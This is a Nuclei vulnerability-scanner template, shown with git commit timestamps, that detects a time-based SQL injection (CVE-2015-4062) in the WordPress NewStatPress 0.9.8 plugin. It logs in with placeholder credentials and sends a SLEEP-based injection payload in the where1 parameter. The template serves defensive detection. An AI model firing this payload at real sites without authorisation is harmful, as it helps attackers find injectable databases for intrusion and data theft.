nuclei-templates/http/cves/2015/CVE-2015-4062.yaml

55 lines
2.2 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2015-4062
info:
name: WordPress NewStatPress 0.9.8 - SQL Injection
2023-03-05 13:42:10 +00:00
author: r3Y3r53
2023-07-11 19:49:27 +00:00
severity: medium
2023-03-05 13:42:10 +00:00
description: |
WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
2023-09-06 13:22:34 +00:00
remediation: |
Update to plugin version 0.9.9 or latest.
2023-03-05 13:42:10 +00:00
reference:
- https://packetstormsecurity.com/files/132038/
- https://wordpress.org/plugins/newstatpress
- http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-4062
2023-07-15 16:29:17 +00:00
- https://wordpress.org/plugins/newstatpress/changelog/
2023-03-05 13:42:10 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P
cvss-score: 6.5
2023-03-05 13:42:10 +00:00
cve-id: CVE-2015-4062
cwe-id: CWE-89
2024-05-31 19:23:20 +00:00
epss-score: 0.0272
epss-percentile: 0.90505
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 13:22:34 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: newstatpress_project
product: newstatpress
2023-09-06 13:22:34 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project
2023-03-05 13:42:10 +00:00
http:
2023-03-05 13:42:10 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 20s
2023-03-05 13:42:10 +00:00
GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body_2, "newstatpress_page_nsp_search")'
condition: and
# digest: 490a0046304402206afe631ad8f093e0e82bb2d01736518d96616950971ac077d2ed68d07fc2209b02204867eca23d5337e9b83cb4066ed5a73d791aa434fe9f29e1b1f4762ae55b7368:922c64590222798bb761d5b6d8e72950